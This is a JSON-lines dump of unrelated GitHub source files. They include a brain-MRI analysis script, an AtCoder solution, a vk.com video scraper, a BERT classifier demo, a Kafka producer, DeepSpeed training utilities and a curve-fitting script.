= 
np.reshape(fold['valid'].loc[\n :, brain_region].values, (-1, 1))\n y_train = np.concatenate((y_train, y_valid))\n y_test = np.reshape(fold['test'].loc[\n :, brain_region].values, (-1, 1))\n\n scaler = StandardScaler()\n y_train = scaler.fit_transform(y_train)\n y_test = scaler.transform(y_test).squeeze()\n x_plot = (train_dict[region_name][k][\n 'x_train']*(max_age - min_age)) + min_age\n x_test = (fold['test'].loc[\n :, 'age_mri'].values).squeeze()\n range_in = (range_in*(max_age - min_age)) + min_age\n axs[i % rows, i // rows].plot(range_in, mean_pred, 'b')\n axs[i % rows, i // rows].fill_between(\n range_in, lower, upper, alpha=0.5)\n axs[i % rows, i // rows].scatter(\n x_plot,\n train_dict[region_name][k]['y_train'].ravel(),\n color='k', alpha=0.6, s=7)\n axs[i % rows, i // rows].scatter(\n x_test, y_test,\n color='r', alpha=0.6, s=7)\n axs[i % rows, i // rows].legend(\n ['Mean', '1 SD', 'Training data', 'Test data'])\n axs[i % rows, i // rows].title.set_text(\n f'{region_name}')\n fig.savefig(fold_p / Path(f'{model} {brain_measure}.png'))\n plt.clf()\n plt.close(fig)\n\n for model in models:\n model_p = Path('private_results') / Path(f'{model}')\n if not model_p.is_dir():\n model_p.mkdir(parents=True, exist_ok=True)\n\n df_int_p = pd.DataFrame.from_dict(pvalues_dict[model]['int_symptoms'])\n df_ext_p = pd.DataFrame.from_dict(pvalues_dict[model]['ext_symptoms'])\n df_dp_p = pd.DataFrame.from_dict(pvalues_dict[model]['dp_symptoms'])\n\n df_int_t = pd.DataFrame.from_dict(tvalues_dict[model]['int_symptoms'])\n df_ext_t = pd.DataFrame.from_dict(tvalues_dict[model]['ext_symptoms'])\n df_dp_t = pd.DataFrame.from_dict(tvalues_dict[model]['dp_symptoms'])\n\n df_int_t_abs = pd.DataFrame.from_dict(\n tvalues_dict_abs[model]['int_symptoms'])\n df_ext_t_abs = pd.DataFrame.from_dict(\n tvalues_dict_abs[model]['ext_symptoms'])\n df_dp_t_abs = pd.DataFrame.from_dict(\n tvalues_dict_abs[model]['dp_symptoms'])\n\n df_int_p_abs = pd.DataFrame.from_dict(\n pvalues_dict_abs[model]['int_symptoms'])\n df_ext_p_abs = pd.DataFrame.from_dict(\n pvalues_dict_abs[model]['ext_symptoms'])\n df_dp_p_abs = pd.DataFrame.from_dict(\n pvalues_dict_abs[model]['dp_symptoms'])\n\n df_kernel = pd.DataFrame.from_dict(kernel_dict_full[model])\n for brain_measure in brain_measures:\n brain_measure_p = model_p / Path(f'{brain_measure}')\n if not brain_measure_p.is_dir():\n brain_measure_p.mkdir(parents=True, exist_ok=True)\n df_int = pd.DataFrame(\n np.empty((df_int_p[brain_measure].shape[0], 3)),\n columns=['Rejected', 'P-values', 'T-values'],\n index=df_int_p.index)\n df_ext = pd.DataFrame(\n np.empty((df_ext_p[brain_measure].shape[0], 3)),\n columns=['Rejected', 'P-values', 'T-values'],\n index=df_ext_p.index)\n df_dp = pd.DataFrame(\n np.empty((df_dp_p[brain_measure].shape[0], 3)),\n columns=['Rejected', 'P-values', 'T-values'],\n index=df_dp_p.index)\n\n df_int_abs = pd.DataFrame(\n np.empty((df_int_p_abs[brain_measure].shape[0], 3)),\n columns=['Rejected', 'P-values', 'T-values'],\n index=df_int_p.index)\n df_ext_abs = pd.DataFrame(\n np.empty((df_ext_p_abs[brain_measure].shape[0], 3)),\n columns=['Rejected', 'P-values', 'T-values'],\n index=df_ext_p.index)\n df_dp_abs = pd.DataFrame(\n np.empty((df_dp_p_abs[brain_measure].shape[0], 3)),\n columns=['Rejected', 'P-values', 'T-values'],\n index=df_dp_p.index)\n\n df_int['P-values'] = df_int_p[brain_measure]\n df_int['T-values'] = df_int_t[brain_measure]\n df_ext['P-values'] = df_ext_p[brain_measure]\n df_ext['T-values'] = df_ext_t[brain_measure]\n df_dp['P-values'] = 
df_dp_p[brain_measure]\n            df_dp['T-values'] = df_dp_t[brain_measure]\n\n            df_int_abs['P-values'] = df_int_p_abs[brain_measure]\n            df_int_abs['T-values'] = df_int_t_abs[brain_measure]\n            df_ext_abs['P-values'] = df_ext_p_abs[brain_measure]\n            df_ext_abs['T-values'] = df_ext_t_abs[brain_measure]\n            df_dp_abs['P-values'] = df_dp_p_abs[brain_measure]\n            df_dp_abs['T-values'] = df_dp_t_abs[brain_measure]\n\n            print(df_int)\n            print(df_ext)\n            print(df_dp)\n            print(df_int_abs)\n            print(df_ext_abs)\n            print(df_dp_abs)\n\n            df_int.to_csv(brain_measure_p / 'results_int.csv')\n            df_ext.to_csv(brain_measure_p / 'results_ext.csv')\n            df_dp.to_csv(brain_measure_p / 'results_dp.csv')\n            df_int_abs.to_csv(brain_measure_p / 'results_int_abs.csv')\n            df_ext_abs.to_csv(brain_measure_p / 'results_ext_abs.csv')\n            df_dp_abs.to_csv(brain_measure_p / 'results_dp_abs.csv')\n            df_kernel.to_csv(brain_measure_p / 'best_kernels.csv')\n\n            prediction_p = brain_measure_p / Path('predictions')\n            if not prediction_p.is_dir():\n                prediction_p.mkdir(\n                    parents=True, exist_ok=True)\n            for (region_name, region_df) in pred_dict_full[\n                    model][brain_measure].items():\n                region_name_p = prediction_p / Path(f'{region_name}')\n                if not region_name_p.is_dir():\n                    region_name_p.mkdir(parents=True, exist_ok=True)\n                region_df.to_csv(region_name_p / 'predictions.csv')\n","repo_name":"eloygeenjaar/normative-smri-psychopathology","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":33181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
{"seq_id":"31414399648","text":"import copy\nN, S = input().split()\nN = int(N)\nresult = 0\ndata = [0,0,0,0]\nrukieiwadata = [[0,0,0,0]]\nfor i in range(N):\n    if (S[i] == 'A'):\n        data[0] = data[0] + 1\n    elif (S[i] == 'G'):\n        data[1] = data[1] + 1\n    elif (S[i] == 'C'):\n        data[2] = data[2] + 1\n    else:\n        data[3] = data[3] + 1\n    rukieiwadata.append(copy.copy(data))\nfor i in range(N+1):\n    for j in range(i+1,N+1):\n        if ((rukieiwadata[j][0] - rukieiwadata[i][0]) == (rukieiwadata[j][3] - rukieiwadata[i][3]) and (rukieiwadata[j][1] - rukieiwadata[i][1]) == (rukieiwadata[j][2] - rukieiwadata[i][2])):\n            print(rukieiwadata[j])\n            print(rukieiwadata[i])\n            result += 1\nprint(result)","repo_name":"yamaguchitakaaki/AtCoderSource","sub_path":"AtCoder Regular Contest 104/DNA Sequence.py","file_name":"DNA Sequence.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
{"seq_id":"17019566700","text":"class Cell:\n    _cell_symbol = '*'\n\n    def __init__(self, cells):\n        self._cells = cells\n\n    @property\n    def cells(self):\n        return self._cells\n\n    def __add__(self, other):\n        return Cell(self.cells + other.cells)\n\n    def __sub__(self, other):\n        if self.cells > other.cells:\n            return Cell(self.cells - other.cells)\n        else:\n            raise ValueError('Итоговое количество клеток должно быть больше нуля')\n\n    def __mul__(self, other):\n        return Cell(self.cells * other.cells)\n\n    def __truediv__(self, other):\n        div = round(self.cells / other.cells)\n        if div > 0:\n            return Cell(div)\n        else:\n            raise ValueError('Итоговое количество клеток должно быть больше нуля')\n\n    def __str__(self):\n        return f'{self.cells} cells'\n\n    def make_order(self, cell_in_row):\n        result = []\n        rest = self.cells\n        while rest > 0:\n            item = str(self._cell_symbol * cell_in_row) if rest > cell_in_row else str(self._cell_symbol * rest)\n            result.append(item)\n            rest -= cell_in_row\n\n        return '\\n'.join(result)\n\n\ncell_1 = Cell(15)\ncell_2 = 
Cell(38)\n\nprint(cell_1 + cell_2)\nprint(cell_2 - cell_1)\nprint(cell_2 * cell_1)\nprint(cell_2 / cell_1)\nprint('=' * 124)\nprint(cell_1.make_order(4))\nprint('=' * 124)\nprint(cell_2.make_order(7))\nprint('=' * 124)\ntry:\n    cell_1 - cell_2\nexcept ValueError as error:\n    print(error)\nprint('=' * 124)\ntry:\n    cell_1 / cell_2\nexcept ValueError as error:\n    print(error)\n","repo_name":"alxrusinov/pythonProject","sub_path":"lesson_7/ex_3.py","file_name":"ex_3.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
+{"seq_id":"29960817756","text":"#################\n### ATTENTION ###\n#################\n\n# Requires login. vk is currently suspended\n\nimport re\nimport cfscrape\nfrom pyquery import PyQuery as pq\nfrom ..utils import FetchException, scrapertools\n\nimport urllib.parse as urlparse\n\nscraper = cfscrape.create_scraper()\n\nclass vk_IE:\n    def __init__(self):\n        self.regexes = [r\"^(?:https?://)?(?:www\\.)?vk\\.com/video_ext\\.php\\?\"]\n        self.aggregate = False\n    \n    def rewrite(self, url, find):\n        for r in self.regexes:\n            obj = re.match(r, url)\n            if obj:\n                d = dict(urlparse.parse_qsl(urlparse.urlsplit(url).query))\n                return \"vk.com/video_ext.php?oid={0}&id={1}&hash={2}\".format(d['oid'], d['id'], d['hash'])\n        \n        raise FetchException.RewriteError()\n    \n    \n    def supports(self, url):\n        for r in self.regexes:\n            if re.match(r, url):\n                return True\n        \n        return False\n    \n    \n    def get(self, url, headers, bestOnly=True):\n        \n        html = scraper.get(url, headers=headers).content\n        \n        d = pq(html)\n        \n        for e in d('light_cry_dog').items():\n            raise FetchException.FileDeleted()\n        \n        #video_urls = scrapertools.find_multiple_matches(html.decode('utf-8'), 'mp4:\"(.*?.mp4)\",')\n        video_urls = scrapertools.find_multiple_matches(html.decode('utf-8'), '\"url[0-9]{3,4}\":\"(.*?)\"')\n        \n        if video_urls:\n            return video_urls\n        else:\n            raise FetchException.ScriptError()\n\n\n    def test(self):\n        return []\n\n\n# Returns an array of possible video URLs from the page_url\ndef get_video_url(page_url, premium=False, user=\"\", password=\"\", video_password=\"\"):\n    logger.info(\"(page_url='%s')\" % page_url)\n\n    video_urls = []\n    try:\n        oid, id = scrapertools.find_single_match(page_url, 'oid=([^&]+)&id=(\\d+)')\n    except:\n        oid, id = scrapertools.find_single_match(page_url, 'video(\\d+)_(\\d+)')\n\n    from core import httptools\n    headers = {'User-Agent': 'Mozilla/5.0'}\n    url = \"http://vk.com/al_video.php?act=show_inline&al=1&video=%s_%s\" % (oid, id)\n    data = httptools.downloadpage(url, headers=headers).data\n\n    matches = scrapertools.find_multiple_matches(data, '= 7, < 8\",\n    \"colorama >= 0.3.9, < 1\",\n    \"imageio >= 2.3.0, < 3\",\n    \"numpy >= 1.11.2, < 2\",\n    \"pystache >= 0.5.4, < 1\",\n    \"requests >= 2, < 3\",\n    \"scipy >= 0.1.0, < 2\",\n    \"sawmill >= 0.2.1, < 1\",\n    \"scikit-image >= 0.15.0, < 1\",\n    \"tensorflow >= 1, < 2\"\n]\nDOC_REQUIRES = [\n    \"changelog >= 0.4, < 1\",\n    \"sphinx >= 1.6, < 2\",\n    \"sphinx-click>=1.2.0\",\n    \"sphinx_rtd_theme >= 0.1.6, < 1\"\n]\nTEST_REQUIRES = [\n    \"pytest-runner >= 2.7, < 3\",\n    \"pytest >= 4.4.0, < 5\",\n    \"pytest-mock >= 1.1, < 2\",\n    \"pytest-xdist >= 1.1, < 2\",\n    \"pytest-cov >= 2, < 3\"\n]\n\nsetup(\n    name=\"stylish\",\n    version=VERSION,\n    description=\"Style transfer using deep neural network.\",\n    long_description=open(README_PATH).read(),\n    url=\"http://github.com/buddly27/stylish\",\n    keywords=[\"tensorflow\", \"style\", \"transfer\", \"CNN\"],\n    author=\"Jeremy Retailleau\",\n    
packages=find_packages(SOURCE_PATH),\n    package_dir={\n        \"\": \"source\"\n    },\n    include_package_data=True,\n    install_requires=INSTALL_REQUIRES,\n    tests_require=TEST_REQUIRES,\n    extras_require={\n        \"doc\": DOC_REQUIRES,\n        \"test\": TEST_REQUIRES,\n        \"dev\": DOC_REQUIRES + TEST_REQUIRES\n    },\n    zip_safe=False,\n    entry_points={\n        \"console_scripts\": [\n            \"stylish = stylish.__main__:main\"\n        ]\n    },\n)\n","repo_name":"buddly27/stylish","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"}
+{"seq_id":"11485109509","text":"import torch\nfrom transformers import BertModel\nfrom torch import nn\nfrom transformers import BertTokenizer\n\ntokenizer = BertTokenizer.from_pretrained('bert-base-chinese')\ninput_data = '新装三天空调室内漏水'\ninputs = tokenizer.encode_plus(\n    input_data,\n    None,\n    add_special_tokens=True,\n    max_length=512,\n    padding='max_length',\n    return_token_type_ids=False,\n    return_attention_mask=True,\n    return_tensors='pt'\n)\ninput_ids = inputs['input_ids']\nattention_mask = inputs['attention_mask']\n\nclass BertClassifier(nn.Module):\n    def __init__(self, dropout=0.5):\n        super(BertClassifier, self).__init__()\n        self.bert = BertModel.from_pretrained('bert-base-chinese')\n        self.dropout = nn.Dropout(dropout)\n        self.linear = nn.Linear(768, 5)\n        self.relu = nn.ReLU()\n\n    def forward(self, input_id, mask):\n        _, pooled_output = self.bert(input_ids= input_id, attention_mask=mask,return_dict=False)\n        dropout_output = self.dropout(pooled_output)\n        linear_output = self.linear(dropout_output)\n        final_layer = self.relu(linear_output)\n        return final_layer\n\n# Load the saved model\nmodel = torch.load('full_model.pkl')\n# Put the model in evaluation mode\nmodel.eval()\n# Pass the input data to the model for prediction\n\n\noutput = model(input_ids, attention_mask)\n_, predicted = torch.max(output.data, 1)\nprint(predicted)","repo_name":"13060923171/Data_analysis-Algorithmic_combat","sub_path":"pytorch-LSTM、bert分类模型/bert模型/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"}
+{"seq_id":"30066980600","text":"from confluent_kafka import Producer\nimport sys\nfrom datetime import datetime\n\nif __name__ == '__main__':\n\n    broker = 'localhost:9093'\n    topic = 'test'\n\n    conf = {'bootstrap.servers': broker}\n\n    # Create Producer instance\n    p = Producer(**conf)\n\n    # Optional per-message delivery callback (triggered by poll() or flush())\n    # when a message has been successfully delivered or permanently\n    # failed delivery (after retries).\n    def delivery_callback(err, msg):\n        if err:\n            sys.stderr.write('%% Message failed delivery: %s\\n' % err)\n        else:\n            sys.stderr.write('%% Message delivered to %s [%d] @ %d\\n' %\n                             (msg.topic(), msg.partition(), msg.offset()))\n\n    def msg_generator(num_messages):\n        for i in range(num_messages):\n            yield f'message number: {i} - {datetime.now().strftime(\"%Y.%m.%d, %H:%M:%S %f\")}'\n\n    # Produce each generated message to Kafka\n    for line in msg_generator(1000):\n        try:\n            # Produce line (without newline)\n            p.produce(topic, line, callback=delivery_callback)\n\n        except BufferError:\n            sys.stderr.write('%% Local producer queue is full (%d messages awaiting delivery): try again\\n' %\n                             len(p))\n        p.poll(0)\n    p.produce(topic, 'the end', callback=delivery_callback)\n    p.poll(0)\n    # Wait until all messages have been delivered\n    sys.stderr.write('%% Waiting for %d deliveries\\n' % len(p))\n    
p.flush()","repo_name":"Tsezia/kafka","sub_path":"producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
+{"seq_id":"29384500771","text":"from kivy.app import App\n\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.label import Label\nfrom kivy.uix.textinput import TextInput\n\n\nclass MainScreen(GridLayout):\n    def __init__(self,**kwargs):\n        super(MainScreen,self).__init__(**kwargs) # implements the features of a GridLayout (the base class of MainScreen)\n        self.cols=3\n        \n        l1=Label(text='Workout')\n        l2=Label(text='Day')\n        l3=Label(text='Time')\n\n        in1=TextInput(multiline=False) # multiline determines if more than one line of text is allowed (optional argument)\n        in2=TextInput(multiline=False)\n        in3=TextInput(multiline=False)\n\n        self.add_widget(l1) # Adds widgets to the layout\n        self.add_widget(l2)\n        self.add_widget(l3)\n        self.add_widget(in1)\n        self.add_widget(in2)\n        self.add_widget(in3)\n        \n\nclass WorkoutApp(App): # Inherits all properties of App \n    def build(self):\n        return MainScreen()\n\n\nif __name__=='__main__':\n    WorkoutApp().run() # run() is a method of kivy App class\n\n\n","repo_name":"adasilva/intro_kivy","sub_path":"01_buildingblocks/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"29"}
+{"seq_id":"2681255443","text":"from flask import Flask\nimport json\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef hello():\n    dictValue = {'key1':'value1','key2':'value2'}\n    return json.dumps(dictValue)\n\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0',port=9090)\n","repo_name":"yuezhongtao/python-demos","sub_path":"flask-server/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
+{"seq_id":"34536550103","text":"# coding=utf-8\n\n\n\"\"\"Utilities for logging and serialization\"\"\"\n\nimport os\nimport random\nimport numpy as np\nimport torch\nimport time\n\nfrom fp16 import FP16_Optimizer\nimport mpu\nimport deepspeed\nfrom apex.optimizers import FusedAdam as Adam\nfrom fp16 import FP16_Module\nfrom fp16 import FP16_Optimizer\nfrom learning_rates import AnnealingLR\nfrom model import EncDecModel, EncDecConfig\nfrom model import (\n    enc_dec_get_params_for_weight_decay_optimization,\n    enc_dec_get_params_for_prompt_optimization,\n)\n\nfrom model import DistributedDataParallel as DDP\n\ndef print_rank_0(message):\n    if torch.distributed.is_initialized():\n        if torch.distributed.get_rank() == 0:\n            print(message, flush=True)\n    else:\n        print(message, flush=True)\n\n\ndef print_args(args):\n    \"\"\"Print arguments.\"\"\"\n\n    print('arguments:', flush=True)\n    for arg in vars(args):\n        dots = '.' 
* (29 - len(arg))\n print(' {} {} {}'.format(arg, dots, getattr(args, arg)), flush=True)\n\n\ndef save_rank_0(args, message):\n if torch.distributed.is_initialized():\n if torch.distributed.get_rank() == 0:\n with open(args.log_file, \"a\") as f:\n f.write(message + \"\\n\")\n f.flush()\n else:\n with open(args.log_file, \"a\") as f:\n f.write(message + \"\\n\")\n f.flush()\n\n\ndef get_model(args, vocab_size, prompt_config=None):\n \"\"\"Build the model.\"\"\"\n\n print_rank_0('building Enc-Dec model ...')\n config = EncDecConfig.from_json_file(args.model_config)\n config.vocab_size = vocab_size\n model = EncDecModel(config,\n parallel_output=True,\n checkpoint_activations=args.checkpoint_activations,\n checkpoint_num_layers=args.checkpoint_num_layers,\n prompt_config=prompt_config)\n\n if mpu.get_data_parallel_rank() == 0:\n print(' > number of parameters on model parallel rank {}: {}'.format(\n mpu.get_model_parallel_rank(),\n sum([p.nelement() for p in model.parameters()])), flush=True)\n\n # To prevent OOM for model sizes that cannot fit in GPU memory in full precision\n if args.deepspeed and args.fp16:\n model.half()\n\n # GPU allocation.\n model.cuda(torch.cuda.current_device())\n if args.prompt_tune and prompt_config[\"init_scratch\"]:\n model.init_prompt_embeds()\n\n # Fp16 conversion.\n if args.fp16:\n model = FP16_Module(model)\n\n # Wrap model for distributed training.\n model = DDP(model)\n\n return model\n\n\ndef get_optimizer(model, args, prompt_config=None):\n \"\"\"Set up the optimizer.\"\"\"\n\n # Build parameter groups (weight decay and non-decay).\n while isinstance(model, (DDP, FP16_Module)):\n model = model.module\n if args.prompt_tune and prompt_config[\"fix_model\"]:\n param_groups = enc_dec_get_params_for_prompt_optimization(model)\n else:\n param_groups = enc_dec_get_params_for_weight_decay_optimization(model)\n \n # Add model parallel attribute if it is not set.\n for param_group in param_groups:\n for param in param_group['params']:\n if not hasattr(param, 'model_parallel'):\n param.model_parallel = False\n\n if args.cpu_optimizer:\n if args.cpu_torch_adam:\n cpu_adam_optimizer = torch.optim.Adam\n else:\n from deepspeed.ops.adam import DeepSpeedCPUAdam\n cpu_adam_optimizer = DeepSpeedCPUAdam\n optimizer = cpu_adam_optimizer(param_groups,\n lr=args.lr, weight_decay=args.weight_decay)\n else:\n # Use FusedAdam.\n optimizer = Adam(param_groups,\n lr=args.lr, weight_decay=args.weight_decay)\n\n print(f'Optimizer = {optimizer.__class__.__name__}')\n if args.deepspeed:\n # fp16 wrapper is not required for DeepSpeed.\n return optimizer\n\n # Wrap into fp16 optimizer.\n if args.fp16:\n optimizer = FP16_Optimizer(optimizer,\n static_loss_scale=args.loss_scale,\n dynamic_loss_scale=args.dynamic_loss_scale,\n dynamic_loss_args={\n 'scale_window': args.loss_scale_window,\n 'min_scale': args.min_scale,\n 'delayed_shift': args.hysteresis})\n\n if torch.distributed.get_rank() == 0:\n print(optimizer.param_groups)\n\n return optimizer\n\n\ndef get_learning_rate_scheduler(optimizer, args):\n \"\"\"Build the learning rate scheduler.\"\"\"\n\n # Add linear learning rate scheduler.\n if args.lr_decay_iters is not None:\n num_iters = args.lr_decay_iters\n else:\n num_iters = args.train_iters\n num_iters = max(1, num_iters)\n init_step = -1\n if args.warmup_iter > 0:\n warmup_iter = args.warmup_iter\n else:\n warmup_iter = args.warmup * num_iters\n lr_scheduler = AnnealingLR(optimizer,\n start_lr=args.lr,\n warmup_iter=warmup_iter,\n num_iters=num_iters,\n 
decay_style=args.lr_decay_style,\n                               last_iter=init_step,\n                               gradient_accumulation_steps=args.gradient_accumulation_steps)\n\n    return lr_scheduler\n\n\ndef setup_model_and_optimizer(args, vocab_size, ds_config, prompt_config=None):\n    \"\"\"Setup model and optimizer.\"\"\"\n\n    model = get_model(args, vocab_size, prompt_config)\n    optimizer = get_optimizer(model, args, prompt_config)\n    lr_scheduler = get_learning_rate_scheduler(optimizer, args)\n\n    if args.deepspeed:\n        print_rank_0(\"DeepSpeed is enabled.\")\n\n        model, optimizer, _, lr_scheduler = deepspeed.initialize(\n            model=model,\n            optimizer=optimizer,\n            args=args,\n            lr_scheduler=lr_scheduler,\n            mpu=mpu,\n            dist_init_required=False,\n            config_params=ds_config\n        )\n\n    print(args.load)\n    if args.load is not None:\n        args.iteration = load_checkpoint(model, optimizer, lr_scheduler, args, prompt_config)\n    else:\n        args.iteration = 0\n\n    return model, optimizer, lr_scheduler\n\n\ndef set_deepspeed_activation_checkpointing(args):\n\n    deepspeed.checkpointing.configure(mpu, deepspeed_config=args.deepspeed_config, num_checkpoints=args.num_checkpoints)\n    mpu.checkpoint = deepspeed.checkpointing.checkpoint\n    mpu.get_cuda_rng_tracker = deepspeed.checkpointing.get_cuda_rng_tracker\n    mpu.model_parallel_cuda_manual_seed = deepspeed.checkpointing.model_parallel_cuda_manual_seed\n\n\ndef initialize_distributed(args):\n    \"\"\"Initialize torch.distributed.\"\"\"\n\n    # Manually set the device ids.\n    device = args.rank % torch.cuda.device_count()\n    if args.local_rank is not None:\n        device = args.local_rank\n    torch.cuda.set_device(device)\n    # Call the init process\n    deepspeed.init_distributed()\n\n    # Set the model-parallel / data-parallel communicators.\n    mpu.initialize_model_parallel(args.model_parallel_size)\n\n    # Optional DeepSpeed Activation Checkpointing Features\n    if args.deepspeed and args.deepspeed_activation_checkpointing:\n        set_deepspeed_activation_checkpointing(args)\n\n\ndef set_random_seed(seed):\n    \"\"\"Set random seed for reproducibility.\"\"\"\n\n    if seed is not None and seed > 0:\n        random.seed(seed)\n        np.random.seed(seed)\n        torch.manual_seed(seed)\n        mpu.model_parallel_cuda_manual_seed(seed)\n\n\ndef save_checkpoint(iteration, model, optimizer,\n                    lr_scheduler, args, save_dir=None):\n    \"\"\"Save a model checkpoint.\"\"\"\n    save_ds_checkpoint(iteration, model, args, save_dir)\n\n    # Wait so everyone is done (necessary)\n    torch.distributed.barrier()\n    # And update the latest iteration\n    if torch.distributed.get_rank() == 0:\n        tracker_filename = os.path.join(args.save, 'latest_checkpointed_iteration.txt')\n        with open(tracker_filename, 'w') as f:\n            f.write(str(iteration))\n    # Wait so everyone is done (not necessary)\n    torch.distributed.barrier()\n\n\ndef save_ds_checkpoint(iteration, model, args, save_dir=None):\n    \"\"\"Save a model checkpoint.\"\"\"\n\n    sd = {}\n    sd['iteration'] = iteration\n\n    if args.save_prompt_only:\n        prompt = model.module.module.module.get_prompt_embeds()\n        save_prompt(args.save if save_dir is None else save_dir, iteration, prompt[\"encoder\"])\n    else:\n        model.save_checkpoint(args.save if save_dir is None else save_dir, str(iteration), client_state = sd, save_zero=False)\n\n\ndef save_prompt(save_dir, iteration, prompt_embeds):\n    save_path = os.path.join(save_dir, \"prompt-{}.pt\".format(iteration))\n    if torch.distributed.get_rank() == 0:\n        torch.save(prompt_embeds, save_path)\n\n\ndef get_checkpoint_iteration(args):\n    # Read the tracker file and set the iteration.\n    tracker_filename = os.path.join(args.load, 
'latest_checkpointed_iteration.txt')\n if not os.path.isfile(tracker_filename):\n print_rank_0('WARNING: could not find the metadata file {} '.format(\n tracker_filename))\n print_rank_0(' will not load any checkpoints and will start from '\n 'random')\n return 0, False, False\n iteration = 0\n release = False\n with open(tracker_filename, 'r') as f:\n metastring = f.read().strip()\n try:\n iteration = int(metastring)\n except ValueError:\n release = metastring == 'release'\n if not release:\n print_rank_0('ERROR: Invalid metadata file {}. Exiting'.format(\n tracker_filename))\n exit()\n\n assert iteration > 0 or release, 'error parsing metadata file {}'.format(\n tracker_filename)\n \n return iteration, release, True\n\n\ndef load_prompt(load_dir):\n prompt = torch.load(load_dir, map_location=lambda storage, loc: storage)\n return prompt\n\n\ndef load_checkpoint(model, optimizer, lr_scheduler, args, prompt_config=None):\n \"\"\"Load a model checkpoint.\"\"\"\n\n iteration, release, success = get_checkpoint_iteration(args)\n\n if not success:\n return 0\n\n mp_rank = mpu.get_model_parallel_rank()\n checkpoint_name = os.path.join(args.load,\n str(iteration),\n 'mp_rank_{:02d}'.format(mp_rank) + '_model_states.pt')\n\n if not os.path.exists(checkpoint_name):\n print('Client provided checkpoint load path: {} does not exist ... skip checkpoint load'.format(checkpoint_name))\n if mpu.get_data_parallel_rank() == 0:\n print(\"Unable to load checkpoint.\")\n return iteration\n\n print('loading checkpoint: {}'.format(checkpoint_name))\n sd = torch.load(checkpoint_name, map_location=lambda storage, loc: storage)\n\n if args.prompt_tune:\n load_prompt_path = prompt_config.get(\"load_prompt\")\n if load_prompt_path is not None and len(load_prompt_path) > 0:\n prompt_embeds = load_prompt(load_prompt_path)\n sd[\"module\"][\"encoder.prompt_embeds.weight\"] = prompt_embeds \n\n model.module.load_state_dict(sd[\"module\"], strict=False)\n\n iteration = sd['iteration']\n\n torch.distributed.barrier()\n if mpu.get_data_parallel_rank() == 0:\n print(' successfully loaded {}'.format(checkpoint_name))\n\n return iteration\n\n\nclass Timers:\n \"\"\"Group of timers.\"\"\"\n\n class Timer:\n \"\"\"Timer.\"\"\"\n\n def __init__(self, name):\n self.name_ = name\n self.elapsed_ = 0.0\n self.started_ = False\n self.start_time = time.time()\n\n def start(self):\n \"\"\"Start the timer.\"\"\"\n assert not self.started_, 'timer has already been started'\n torch.cuda.synchronize()\n self.start_time = time.time()\n self.started_ = True\n\n def stop(self):\n \"\"\"Stop the timer.\"\"\"\n assert self.started_, 'timer is not started'\n torch.cuda.synchronize()\n self.elapsed_ += (time.time() - self.start_time)\n self.started_ = False\n\n def reset(self):\n \"\"\"Reset timer.\"\"\"\n self.elapsed_ = 0.0\n self.started_ = False\n\n def elapsed(self, reset=True):\n \"\"\"Calculate the elapsed time.\"\"\"\n started_ = self.started_\n # If the timing in progress, end it first.\n if self.started_:\n self.stop()\n # Get the elapsed time.\n elapsed_ = self.elapsed_\n # Reset the elapsed time\n if reset:\n self.reset()\n # If timing was in progress, set it back.\n if started_:\n self.start()\n return elapsed_\n\n def __init__(self):\n self.timers = {}\n\n def __call__(self, name):\n if name not in self.timers:\n self.timers[name] = self.Timer(name)\n return self.timers[name]\n\n def log(self, names, normalizer=1.0, reset=True):\n \"\"\"Log a group of timers.\"\"\"\n assert normalizer > 0.0\n string = 'time (ms)'\n for name in 
names:\n elapsed_time = self.timers[name].elapsed(\n reset=reset) * 1000.0 / normalizer\n string += ' | {}: {:.2f}'.format(name, elapsed_time)\n print_rank_0(string)\n","repo_name":"thu-coai/PPT","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":13399,"program_lang":"python","lang":"en","doc_type":"code","stars":94,"dataset":"github-code","pt":"29"} +{"seq_id":"28995405818","text":"from lmfit.models import StepModel, ConstantModel, LognormalModel\nfrom scipy.misc import derivative\nfrom multiprocessing import Pool\nfrom functools import partial\nimport pandas as pd\nimport numpy as np\nfrom math import *\nimport argparse\nimport logging\nimport math\n\n# log\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\nhandler = logging.FileHandler(\"./log/selection_categorization.log\")\nhandler.setFormatter(logging.Formatter(\"%(asctime)s; %(levelname)s; %(message)s\"))\nlogger.addHandler(handler)\n\n# args\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--path_df\", type=str, help=\"path to the dataframe containing the new forms and their usage rate per month\")\nparser.add_argument(\"--path_dfRel\", type=str, help=\"path to the dataframe containing the new forms and their relative usage rate per month\")\nparser.add_argument(\"--path_out\", type=str, help=\"Path to the directory containing the output\")\nargs = parser.parse_args()\n\npath_df = args.path_df\npath_dfRel = args.path_dfRel\npath_out = args.path_out\n\nlogger.info(\"path_df : \"+path_df+\" ; path_dfRel : \"+path_dfRel+\" ; path_out : \"+path_out)\n\nlogger.info(\"Fitting the curves for the new words to the two reference functions: logistic and logNormal.\")\n\ndf_5years = pd.read_csv(path_df, index_col=0)\ndf_5years_rel = pd.read_csv(path_dfRel, index_col=0)\ndf_5years_rel = df_5years_rel.set_index(df_5years.form)\ndf_5years = df_5years.set_index(\"form\")\n\ndf_final = 